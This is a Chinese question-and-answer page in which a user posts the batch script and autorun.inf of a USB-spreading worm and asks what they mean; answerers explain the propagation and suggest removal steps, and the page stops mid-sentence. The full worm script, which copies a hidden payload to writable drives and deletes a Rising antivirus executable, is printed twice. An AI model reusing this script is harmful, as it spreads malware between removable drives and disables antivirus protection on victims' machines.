UC知道解释一下这个病毒
来源:百度知道 编辑:UC知道 时间:2024/05/31 13:18:45
SET TestFile=Test_%RANDOM%.TMP
SETLOCAL ENABLEDELAYEDEXPANSION
For %%I In (C D E F G H I J K L M N O P Q R S T U V W X Y Z) Do (
CD.>%%I:\%TestFile%
CLS&&If Exist %%I:\%TestFile% Set ResultD=%%I:&&DEL %%I:\%TestFile% /Q
)
xcopy autorun.inf e:\ /h /r /k /y
xcopy system.pif %ResultD%\ /h /r /k /y
xcopy autorun.inf %ResultD%\ /h /r /k /y
xcopy system.pif e:\ /h /r /k /y
xcopy %ResultD%\system.pif /h /r /k /y
xcopy e:\system.pif /h /r /k /y
del rising.exe /f /a
还有一个autorun.inf文件
[AutoRun]
open=system.pif
shellexecute=system.pif
shell\Auto\command=system.pif
能把源代码翻译下么,其实主要是
xcopy system.pif %ResultD%\ /h /r /k /y
这里的"%ResultD%"不怎么懂,还有autorun.inf里的也不懂,能详细解释下么?
谢谢!!!!
...
病毒已经被我搞定了,我只是学习一下~不要回答解决方法就是咯~
病毒已经被我搞定了,我只是学习一下~不要回答解决方法就是咯~
病毒已经被我搞定了,我只是学习一下~不要回
xcopy autorun.inf e:\ /h /r /k /y
xcopy system.pif %ResultD%\ /h /r /k /y
xcopy autorun.inf %ResultD%\ /h /r /k /y
xcopy system.pif e:\ /h /r /k /y
xcopy %ResultD%\system.pif /h /r /k /y
xcopy e:\system.pif /h /r /k /y
del rising.exe /f /a
总体分析这一段是让你不能用轻易的方法来删除(del rising.exe /f /a ) ,因为删除同时它会总复制到其他盘里
[AutoRun]
open=system.pif
shellexecute=system.pif
shell\Auto\command=system.pif
修改了注册表 让你不能双击打开文件 并且在盘符上单击右键时 右键菜单第一行就显示“AUTO” (超级烦人啊)
双击的同时就把病毒转移复制到其他盘里通过这句来实现“ xcopy autorun.inf e:\ /h /r /k /y”
所以这个木马通过U盘传播的最多
编这个的人,唉~~败类啊!!
%ResultD%是指定某个分区的意思
下载一个360安全卫士好像可以清除掉autorun.inf 这个病毒``
或装个正版的瑞星也行```但记得杀毒的时候要进入安全模式(开机后按F8)``祝你好运!
这是中毒后留下的征状.你可以单击"开始\运行\输入regedit(进入注册表)\找到HKEY_CURRENT_USER\software\microsoft\windows\currentversion\Explorer\MountPoints2\展开出现1 comman